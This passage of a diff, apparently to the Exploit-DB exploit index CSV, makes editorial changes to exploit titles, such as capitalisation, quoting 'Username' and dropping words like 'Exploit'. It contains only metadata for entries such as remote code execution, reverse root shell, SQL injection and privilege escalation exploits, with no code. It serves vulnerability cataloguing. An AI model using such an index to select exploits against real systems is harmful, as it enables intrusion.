Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 @@ -18459,7 +18460,7 @@ id,file,description,date,author,platform,type,port 21170,platforms/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,windows,dos,0 21171,platforms/windows/dos/21171.c,"Microsoft Windows 2000 - Internet Key Exchange Denial of Service (1)",2001-12-11,"Nelson Brito",windows,dos,0 21172,platforms/windows/dos/21172.pl,"Microsoft Windows 2000 - Internet Key Exchange Denial of Service (2)",2001-12-07,"Nelson Brito",windows,dos,0 -21173,platforms/windows/local/21173.pl,"McKesson Pathways Homecare 6.5 - Weak Username and Password Encryption",2001-12-07,shoeboy,windows,local,0 +21173,platforms/windows/local/21173.pl,"McKesson Pathways Homecare 6.5 - Weak 'Username' and Password Encryption",2001-12-07,shoeboy,windows,local,0 21174,platforms/windows/dos/21174.c,"Denicomp Winsock RSHD/NT Standard Error 2.20.00 - Denial of Service",2001-12-10,jimmers,windows,dos,0 21175,platforms/windows/dos/21175.c,"Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service",2001-12-10,jimmers,windows,dos,0 21176,platforms/freebsd/local/21176.c,"FreeBSD 4.4 - AIO Library Cross Process Memory Write",2001-12-10,"David Rufino",freebsd,local,0 @@ -18516,7 +18517,7 @@ id,file,description,date,author,platform,type,port 21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Root Program Execution",2002-01-14,"Charles Stevenson",linux,local,0 21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",windows,dos,0 21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow",2002-01-16,"SuSE Security",linux,local,0 -21230,platforms/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Include",2002-01-16,"Handle Nopman",php,webapps,0 +21230,platforms/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",php,webapps,0 21231,platforms/linux/local/21231.c,"Chinput 3.0 - Environment Variable Buffer Overflow",2002-01-16,xperc,linux,local,0 21232,platforms/multiple/dos/21232.c,"Oracle 8i - dbsnmp Command Remote Denial of Service",2002-01-17,benjurry,multiple,dos,0 21233,platforms/php/webapps/21233.txt,"PHP-Nuke 4.x/5.x - SQL_Debug Information Disclosure",2002-01-18,zataz.com,php,webapps,0 @@ -18551,8 +18552,8 @@ id,file,description,date,author,platform,type,port 21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (1)",2002-02-03,"Dave Wilson",php,remote,0 21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (2)",2002-02-03,anonymous,php,remote,0 21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (3)",2002-02-03,anonymous,php,remote,0 -21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - Cross-Site Request Forgery (Add Admin) Exploit",2012-09-12,LiquidWorm,php,webapps,0 -21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Shell Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0 +21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - Cross-Site Request Forgery (Add Admin)",2012-09-12,LiquidWorm,php,webapps,0 +21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Shell",2012-09-12,"Mattijs van Ommeren",hardware,remote,0 21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 21270,platforms/php/webapps/21270.txt,"Webify Business Directory - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 21271,platforms/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 @@ -18563,7 +18564,7 @@ id,file,description,date,author,platform,type,port 21276,platforms/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,multiple,remote,0 21277,platforms/php/webapps/21277.txt,"Portix-PHP 0.4 - 'index.php' Directory Traversal",2002-02-04,frog,php,webapps,0 21278,platforms/php/webapps/21278.txt,"Portix-PHP 0.4 - view.php Directory Traversal",2002-02-04,frog,php,webapps,0 -21279,platforms/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie manipulation",2002-02-04,frog,php,webapps,0 +21279,platforms/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie Manipulation",2002-02-04,frog,php,webapps,0 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local,0 21281,platforms/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,linux,local,0 21282,platforms/atheos/local/21282.c,"AtheOS 0.3.7 - Change Root Directory Escaping",2002-02-07,Jedi/Sector,atheos,local,0 @@ -18583,7 +18584,7 @@ id,file,description,date,author,platform,type,port 21296,platforms/hardware/dos/21296.c,"Cisco IOS 11/12 - Malformed SNMP Message Denial of Service",2002-02-12,kundera,hardware,dos,0 21297,platforms/unix/remote/21297.c,"Squid 2.0-4 - Cache FTP Proxy URL Buffer Overflow",2002-02-21,gunzip,unix,remote,0 21298,platforms/windows/remote/21298.c,"Essentia Web Server 2.1 - Long URL Buffer Overflow",2003-07-04,B-r00t,windows,remote,0 -21299,platforms/php/webapps/21299.txt,"Powie PForum 1.1x - Username Cross-Site Scripting",2002-02-22,"Jens Liebchen",php,webapps,0 +21299,platforms/php/webapps/21299.txt,"Powie PForum 1.1x - 'Username' Cross-Site Scripting",2002-02-22,"Jens Liebchen",php,webapps,0 21300,platforms/php/webapps/21300.txt,"XMB Forum 1.6 pre-beta - Image Tag Script Injection",2002-02-22,skizzik,php,webapps,0 21301,platforms/php/webapps/21301.txt,"OpenBB 1.0.x - Image Tag Cross-Agent Scripting",2002-02-25,skizzik,php,webapps,0 21302,platforms/linux/local/21302.c,"Century Software Term For Linux 6.27.869 - Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",linux,local,0 @@ -18602,7 +18603,7 @@ id,file,description,date,author,platform,type,port 21317,platforms/php/webapps/21317.txt,"NeoBill CMS 0.8 Alpha - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 21318,platforms/windows/local/21318.pl,"Internet Download Manager - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 21319,platforms/aix/webapps/21319.txt,"Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2012-09-14,modpr0be,aix,webapps,0 -21320,platforms/windows/local/21320.pl,"Internet Download Manager - SEH Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 +21320,platforms/windows/local/21320.pl,"Internet Download Manager - SEH Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 22073,platforms/php/webapps/22073.txt,"APBoard 2.0 2 - Unauthorized Thread Reading",2002-12-06,"DNA ESC",php,webapps,0 21323,platforms/linux/local/21323.c,"libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local,0 21324,platforms/php/webapps/21324.txt,"luxcal 2.7.0 - Multiple Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps,0 @@ -18630,7 +18631,7 @@ id,file,description,date,author,platform,type,port 21349,platforms/php/webapps/21349.txt,"PHP-Nuke 5.x - Error Message Web Root Disclosure",2002-03-21,godminus,php,webapps,0 21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x - Batch File Remote Command Execution",2002-03-21,SPAX,windows,remote,0 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 - Weak Password Encryption",2002-03-22,c3rb3r,windows,local,0 -21352,platforms/cgi/webapps/21352.txt,"DCShop Beta 1.0 - Form manipulation",2002-03-25,"pokleyzz sakamaniaka",cgi,webapps,0 +21352,platforms/cgi/webapps/21352.txt,"DCShop Beta 1.0 - Form Manipulation",2002-03-25,"pokleyzz sakamaniaka",cgi,webapps,0 21353,platforms/linux/local/21353.c,"Linux Kernel 2.2.x / 2.3 / 2.4.x - d_path() Path Truncation (PoC)",2002-03-26,cliph,linux,local,0 21354,platforms/cgi/remote/21354.txt,"CSSearch 2.3 - Remote Command Execution",2002-03-26,"Steve Gustin",cgi,remote,0 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote,0 @@ -18659,7 +18660,7 @@ id,file,description,date,author,platform,type,port 21377,platforms/php/webapps/21377.txt,"SunShop Shopping Cart 1.5/2.x - User-Embedded Scripting",2002-04-13,ppp-design,php,webapps,0 21378,platforms/hardware/remote/21378.txt,"Nortel CVX 1800 Multi-Service Access Switch - Default SNMP Community",2002-04-15,"Michael Rawls",hardware,remote,0 21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0 -21380,platforms/php/webapps/21380.php,"Burning Board 1.1.1 - URL Parameter manipulation",2002-04-15,SeazoN,php,webapps,0 +21380,platforms/php/webapps/21380.php,"Burning Board 1.1.1 - URL Parameter Manipulation",2002-04-15,SeazoN,php,webapps,0 21381,platforms/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,php,webapps,0 21382,platforms/php/webapps/21382.txt,"XGB 1.2 - Remote Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 21383,platforms/php/webapps/21383.txt,"xNewsletter 1.0 - Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 @@ -18670,7 +18671,7 @@ id,file,description,date,author,platform,type,port 21388,platforms/windows/dos/21388.c,"Microsoft Windows 2000 - Lanman Denial of Service (1)",2002-04-17,"Daniel Nystrom",windows,dos,0 21389,platforms/windows/dos/21389.txt,"Microsoft Windows 2000 - Lanman Denial of Service (2)",2003-01-03,ch0wn,windows,dos,0 21390,platforms/cgi/remote/21390.txt,"Sambar Server 5.1 - Script Source Disclosure",2002-04-17,pgrundl,cgi,remote,0 -21391,platforms/php/webapps/21391.txt,"PVote 1.0/1.5 - Poll Content manipulation",2002-04-18,"Daniel Nyström",php,webapps,0 +21391,platforms/php/webapps/21391.txt,"PVote 1.0/1.5 - Poll Content Manipulation",2002-04-18,"Daniel Nyström",php,webapps,0 21392,platforms/windows/webapps/21392.txt,"SpiceWorks 6.0.00993 - Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,windows,webapps,0 21393,platforms/php/webapps/21393.txt,"WordPress Plugin wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps,0 21394,platforms/windows/webapps/21394.txt,"SonicWALL email security 7.3.5 - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,windows,webapps,0 @@ -18686,7 +18687,7 @@ id,file,description,date,author,platform,type,port 21404,platforms/windows/dos/21404.htm,"Microsoft Internet Explorer 5/6 - Self-Referential Object Denial of Service",2002-04-20,"Matthew Murphy",windows,dos,0 21405,platforms/cgi/webapps/21405.txt,"Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting",2002-04-20,BrainRawt,cgi,webapps,0 21406,platforms/cgi/webapps/21406.txt,"Philip Chinery's Guestbook 1.1 - Script Injection",2002-04-21,"markus arndt",cgi,webapps,0 -21407,platforms/bsd/local/21407.c,"Apple Mac OS X 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 +21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0 21409,platforms/unix/dos/21409.pl,"PsyBNC 2.3 - Oversized Passwords Denial of Service",2002-04-22,DVDMAN,unix,dos,0 21410,platforms/windows/remote/21410.pl,"Matu FTP 1.74 - Client Buffer Overflow",2002-04-23,Kanatoko,windows,remote,0 @@ -18702,7 +18703,7 @@ id,file,description,date,author,platform,type,port 21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Login Bypass",2002-04-25,"Ulf Harnhammar",php,webapps,0 21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting",2002-04-25,frog,linux,remote,0 21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection",2002-04-25,frog,php,webapps,0 -21424,platforms/php/webapps/21424.txt,"ADManager 1.1 - Content manipulation",2002-04-17,frog,php,webapps,0 +21424,platforms/php/webapps/21424.txt,"ADManager 1.1 - Content Manipulation",2002-04-17,frog,php,webapps,0 21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass",2002-04-28,ppp-design,php,webapps,0 21426,platforms/php/webapps/21426.txt,"Blahz-DNS 0.2 - Direct Script Call Authentication Bypass",2002-04-28,ppp-design,php,webapps,0 21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting",2002-04-17,frog,php,webapps,0 @@ -18712,7 +18713,7 @@ id,file,description,date,author,platform,type,port 21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service",2002-04-12,"Marcelo Magnasco",irix,dos,0 21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character Denial of Service",2002-04-30,"Peter Gründl",windows,dos,0 21433,platforms/cgi/webapps/21433.txt,"MyGuestbook 1.0 - Script Injection",2002-04-30,BrainRawt,cgi,webapps,0 -21434,platforms/asp/webapps/21434.txt,"Outfront Spooky 2.x - Login SQL Query manipulation Password",2002-05-02,anonymous,asp,webapps,0 +21434,platforms/asp/webapps/21434.txt,"Outfront Spooky 2.x - Login SQL Query Manipulation Password",2002-05-02,anonymous,asp,webapps,0 21435,platforms/cgi/webapps/21435.txt,"askSam 4.0 Web Publisher - Cross-Site Scripting",2002-05-05,frog,cgi,webapps,0 21436,platforms/php/webapps/21436.txt,"B2 0.6 - b2edit.showposts.php b2inc Parameter Remote File Inclusion",2002-05-06,Frank,php,webapps,0 21437,platforms/solaris/remote/21437.c,"Solaris 2/7/8/9 cachefsd - Heap Overflow",2002-01-01,"Last Stage of Delirium",solaris,remote,0 @@ -18873,7 +18874,7 @@ id,file,description,date,author,platform,type,port 21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier",2002-07-03,"Auriemma Luigi",multiple,dos,0 21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos,0 21595,platforms/windows/remote/21595.c,"Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow",2002-07-03,anonymous,windows,remote,0 -21596,platforms/osx/remote/21596.txt,"Apple Mac OS X 10.1.x - SoftwareUpdate Arbitrary Package Installation",2002-07-08,"Russell Harding",osx,remote,0 +21596,platforms/osx/remote/21596.txt,"Apple Mac OSX 10.1.x - SoftwareUpdate Arbitrary Package Installation",2002-07-08,"Russell Harding",osx,remote,0 21597,platforms/windows/remote/21597.txt,"Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure",2002-07-08,Securiteinfo.com,windows,remote,0 21598,platforms/linux/dos/21598.c,"Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion",2002-07-08,"Paul Starzetz",linux,dos,0 21599,platforms/windows/remote/21599.txt,"Working Resources BadBlue 1.7.3 - cleanSearchString() Cross-Site Scripting",2002-07-08,"Matthew Murphy",windows,remote,0 @@ -19086,7 +19087,7 @@ id,file,description,date,author,platform,type,port 21812,platforms/windows/remote/21812.txt,"Microsoft Word 95/97/98/2000/2002 - INCLUDEPICTURE Document Sharing File Disclosure",2002-09-20,"Richard Edwards",windows,remote,0 21813,platforms/windows/dos/21813.c,"Trillian 0.73/0.74 - IRC JOIN Buffer Overflow",2002-09-20,"Lance Fitz-Herbert",windows,dos,0 21814,platforms/linux/local/21814.c,"AlsaPlayer 0.99.71 - Local Buffer Overflow",2002-09-20,zillion,linux,local,0 -21815,platforms/osx/local/21815.txt,"Apple Mac OS X 10.2 - Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",osx,local,0 +21815,platforms/osx/local/21815.txt,"Apple Mac OSX 10.2 - Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",osx,local,0 21816,platforms/windows/dos/21816.c,"Trillian 0.725/0.73/0.74 - IRC User Mode Numeric Remote Buffer Overflow",2002-09-21,"Lance Fitz-Herbert",windows,dos,0 21817,platforms/php/webapps/21817.txt,"Rudi Benkovic JAWMail 1.0 - Script Injection",2002-09-23,"Ulf Harnhammar",php,webapps,0 21818,platforms/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow",2002-09-23,eSDee,linux,remote,0 @@ -19101,16 +19102,16 @@ id,file,description,date,author,platform,type,port 21822,platforms/multiple/webapps/21822.txt,"Endpoint Protector 4.0.4.0 - Multiple Vulnerabilities",2012-10-09,Vulnerability-Lab,multiple,webapps,0 21823,platforms/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",windows,dos,0 -21825,platforms/php/webapps/21825.txt,"phpWebSite 0.8.2 - PHP File Include",2002-09-23,"Tim Vandermeersch",php,webapps,0 +21825,platforms/php/webapps/21825.txt,"phpWebSite 0.8.2 - PHP File Inclusion",2002-09-23,"Tim Vandermeersch",php,webapps,0 21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - SEH Based Buffer Overflow (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0 21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager - Web Interface Cross-Site Scripting",2002-09-23,"Taylor Huff",hardware,remote,0 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 - HTML Injection",2002-09-24,das@hush.com,php,webapps,0 -21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 +21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 - ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload",2012-10-10,Metasploit,php,webapps,0 21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload",2012-10-10,Metasploit,linux,webapps,0 -21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary Upload Remote Code Execution",2012-10-10,Metasploit,windows,remote,4322 +21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary File Upload / Remote Code Execution",2012-10-10,Metasploit,windows,remote,4322 21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter - Buffer Overflow",2012-10-10,Metasploit,windows,remote,3217 21839,platforms/windows/remote/21839.rb,"NTR - ActiveX Control StopModule() Remote Code Execution",2012-10-10,Metasploit,windows,remote,0 21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)",2012-10-10,Metasploit,windows,remote,0 @@ -19334,7 +19335,7 @@ id,file,description,date,author,platform,type,port 22069,platforms/multiple/local/22069.py,"Oracle Database - Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 -22074,platforms/osx/dos/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 +22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final Beta - viewtopic.php Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final Beta - viewtopic.php Cross-Site Scripting",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 - HTML Injection",2002-11-09,"Dorin Balanica",php,webapps,0 @@ -19495,7 +19496,7 @@ id,file,description,date,author,platform,type,port 22235,platforms/linux/local/22235.pl,"Nethack 3 - Local Buffer Overflow (3)",2003-02-10,tsao@efnet,linux,local,0 22236,platforms/hardware/remote/22236.txt,"Netgear FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,hardware,remote,0 22237,platforms/windows/dos/22237.txt,"Microsoft Office Picture Manager 2010 - Crash (PoC)",2012-10-25,coolkaveh,windows,dos,0 -22239,platforms/windows/dos/22239.txt,"Opera 6.0/7.0 - Username URI Warning Dialog Buffer Overflow",2003-02-10,nesumin,windows,dos,0 +22239,platforms/windows/dos/22239.txt,"Opera 6.0/7.0 - 'Username' URI Warning Dialog Buffer Overflow",2003-02-10,nesumin,windows,dos,0 22240,platforms/windows/dos/22240.txt,"Opera 6.0/7.0 - opera.PluginContext Native Method Denial of Service",2003-01-13,"Marc Schoenefeld",windows,dos,0 22241,platforms/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 - Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 22242,platforms/php/webapps/22242.txt,"Cedric Email Reader 0.4 - Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 @@ -19612,7 +19613,7 @@ id,file,description,date,author,platform,type,port 22358,platforms/multiple/dos/22358.cfm,"Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 - java.util.zip Null Value Denial of Service (1)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 22359,platforms/multiple/dos/22359.xsl,"Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 - java.util.zip Null Value Denial of Service (2)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 22360,platforms/multiple/dos/22360.java,"Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 - java.util.zip Null Value Denial of Service (3)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 -22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 - Username Information Disclosure",2003-03-11,plasmahh,linux,remote,0 +22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 - 'Username' Information Disclosure",2003-03-11,plasmahh,linux,remote,0 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (2)",2003-04-10,"Wojciech Purczynski",linux,local,0 22364,platforms/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass",2003-03-17,"dong-h0un U",cgi,webapps,0 @@ -19732,7 +19733,7 @@ id,file,description,date,author,platform,type,port 22480,platforms/hardware/remote/22480.txt,"Linksys BEFVP4 - SNMP Community String Information Disclosure",2003-04-09,"Branson Matheson",hardware,remote,0 22481,platforms/cgi/webapps/22481.txt,"Super Guestbook 1.0 - Sensitive Information Disclosure",2002-04-10,Over_G,cgi,webapps,0 22482,platforms/cgi/webapps/22482.txt,"Guestbook 4.0 - Sensitive Information Disclosure",2003-04-10,Over_G,cgi,webapps,0 -22483,platforms/osx/dos/22483.c,"Apple Mac OS X 10.x - DirectoryService Denial of Service",2003-04-10,"Neeko Oni",osx,dos,0 +22483,platforms/osx/dos/22483.c,"Apple Mac OSX 10.x - DirectoryService Denial of Service",2003-04-10,"Neeko Oni",osx,dos,0 22484,platforms/asp/webapps/22484.txt,"Ocean12 ASP Guestbook Manager 1.0 - Information Disclosure",2003-04-11,drG4njubas,asp,webapps,0 22485,platforms/linux/remote/22485.c,"SheerDNS 1.0 - Information Disclosure",2003-04-14,"Jedi/Sector One",linux,remote,0 22486,platforms/cfm/webapps/22486.txt,"InstaBoard 1.3 - index.cfm SQL Injection",2003-04-14,"Jim Dew",cfm,webapps,0 @@ -19753,7 +19754,7 @@ id,file,description,date,author,platform,type,port 22502,platforms/multiple/dos/22502.pl,"TW-WebServer 1.0 - Denial of Service (1)",2003-04-15,badpack3t,multiple,dos,0 22503,platforms/multiple/dos/22503.c,"TW-WebServer 1.0 - Denial of Service (2)",2003-04-16,"Shashank pandey",multiple,dos,0 22504,platforms/windows/remote/22504.txt,"Cerberus FTP Server 2.1 - Information Disclosure",2003-04-16,"Ziv Kamir",windows,remote,0 -22505,platforms/multiple/dos/22505.txt,"Apache Mod_Access_Referer 1.0.2 - NULL Pointer Dereference Denial of Service",2003-04-16,zillion,multiple,dos,0 +22505,platforms/multiple/dos/22505.txt,"Apache Mod_Access_Referer 1.0.2 - Null Pointer Dereference Denial of Service",2003-04-16,zillion,multiple,dos,0 22506,platforms/windows/remote/22506.txt,"EZ Server 1.0 - File Disclosure",2003-04-17,"gregory Le Bras",windows,remote,0 22507,platforms/asp/webapps/22507.txt,"Web Wiz Forum 6.34 - Information Disclosure",2003-04-17,"Uziel aka nuJIurpuM",asp,webapps,0 22508,platforms/linux/dos/22508.sh,"Xinetd 2.1.x/2.3.x - Rejected Connection Memory Leakage Denial of Service",2003-04-18,"Steve Grubb",linux,dos,0 @@ -19799,7 +19800,7 @@ id,file,description,date,author,platform,type,port 22549,platforms/hardware/webapps/22549.txt,"AVerCaster Pro RS3400 Web Server - Directory Traversal",2012-11-07,"Patrick Saladino",hardware,webapps,0 22550,platforms/windows/dos/22550.pl,"Opera 6.0.x/7.0 - Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",windows,dos,0 22551,platforms/windows/dos/22551.pl,"3D-FTP Client 4.0 - Buffer Overflow",2003-04-28,Over_G,windows,dos,0 -22552,platforms/hp-ux/dos/22552.txt,"HP-UX 10.x/11.x - RExec Remote Username Flag Local Buffer Overrun",2003-04-29,"Davide Del Vecchio",hp-ux,dos,0 +22552,platforms/hp-ux/dos/22552.txt,"HP-UX 10.x/11.x - RExec Remote 'Username' Flag Local Buffer Overrun",2003-04-29,"Davide Del Vecchio",hp-ux,dos,0 22553,platforms/windows/dos/22553.txt,"Microsoft BizTalk Server 2002 - HTTP Receiver Buffer Overflow",2003-04-30,"Cesar Cerrudo",windows,dos,0 22554,platforms/asp/webapps/22554.txt,"Microsoft BizTalk Server 2000/2002 DTA - rawdocdata.asp SQL Injection",2003-04-30,"Cesar Cerrudo",asp,webapps,0 22555,platforms/asp/webapps/22555.txt,"Microsoft BizTalk Server 2000/2002 DTA - RawCustomSearchField.asp SQL Injection",2003-04-30,"Cesar Cerrudo",asp,webapps,0 @@ -19840,7 +19841,7 @@ id,file,description,date,author,platform,type,port 22592,platforms/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi File Disclosure",2003-05-12,"Julio Cesar",cgi,webapps,0 22593,platforms/windows/remote/22593.html,"Yahoo! Voice Chat ActiveX Control 1.0.0.43 - Buffer Overflow",2003-05-12,cesaro,windows,remote,0 22594,platforms/linux/local/22594.c,"CDRTools CDRecord 1.11/2.0 - Devname Format String",2003-05-13,CMN,linux,local,0 -22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 - modules.php Username URI Parameter Cross-Site Scripting",2003-05-13,"Ferruh Mavituna",php,webapps,0 +22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 - modules.php 'Username' URI Parameter Cross-Site Scripting",2003-05-13,"Ferruh Mavituna",php,webapps,0 22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0 22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure",2003-05-13,"Rynho Zeros Web",php,webapps,0 @@ -19950,7 +19951,7 @@ id,file,description,date,author,platform,type,port 22703,platforms/linux/local/22703.c,"XMame 0.6x - Lang Local Buffer Overflow",2003-03-31,"Gabriel A. Maggiotti",linux,local,0 22704,platforms/php/webapps/22704.txt,"Webchat 2.0 Module - Full Path 